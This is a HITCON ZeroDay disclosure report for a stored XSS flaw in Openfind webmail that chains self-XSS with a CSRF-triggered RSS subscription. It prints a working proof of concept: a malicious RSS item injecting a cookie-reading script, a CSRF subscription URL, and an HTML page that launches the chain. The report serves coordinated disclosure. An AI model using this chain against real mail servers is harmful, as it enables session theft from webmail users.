Openfind 知名信箱儲存型XSS漏洞

Vulnerability Overview

ZDID: ZD-2019-00137
發信 Vendor: 網擎資訊軟體股份有限公司
Title: Openfind 知名信箱儲存型XSS漏洞
Introduction: Self-XSS + CSRF = Stored XSS

處理狀態

目前狀態

公開

Last Update : 2019/04/26

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2019/02/13 16:26:39 : 新提交 (由 Linwz 更新此狀態)
2019/02/13 21:35:11 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/02/14 11:19:43 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/02/14 11:19:43 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/04/08 09:58:31 : 複測申請中 (由組織帳號更新此狀態)
2019/04/26 03:00:08 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2019-00137
通報者：linwz (Linwz)
風險：高
類型：預存式跨站腳本攻擊 (Stored Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份，或進行掛碼、轉址等攻擊行為。

漏洞說明： OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則：
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

XSS 防禦繞過方式：
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

分別找到 Self XSS 與 CSRF 相互搭配可以讓使用者點擊惡意網頁後，觸發XSS藉此竊取使用者資料。詳細如下：

1. 構造惡意RSS在伺服器上

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
  <title>XSS</title>
  <link>XSS</link>
  <description>Linwz</description>
  <item>
    <title>XSS</title>
    <link>"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</link>
    <description>XSS</description>
  </item>
</channel>
</rss>

2. CSRF 讓使用者訂閱RSS
此頁面沒有CSRF token保護所以可以透過構造惡意連結觸發任意RSS訂閱。

/cgi-bin/portal?rss_link=http%3A//localhost/r.rss&m=&crumb=&cmd=setconf&lmid=1

3. 轉跳至查看RSS
因首頁顯示RSS內容時，沒有XSS保護故可以跳脫觸發XSS

/cgi-bin/submenu

POC

<html>
    <body>
        <img src="https://target/cgi-bin/portal?rss_link=http%3A//localhost/r.rss&m=&crumb=&cmd=setconf&lmid=1" onerror="location.href = 'https://target/cgi-bin/submenu'">
    </body>
</html>

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

Openfind 知名信箱儲存型XSS漏洞 - HITCON ZeroDay

Vulnerability Detail Report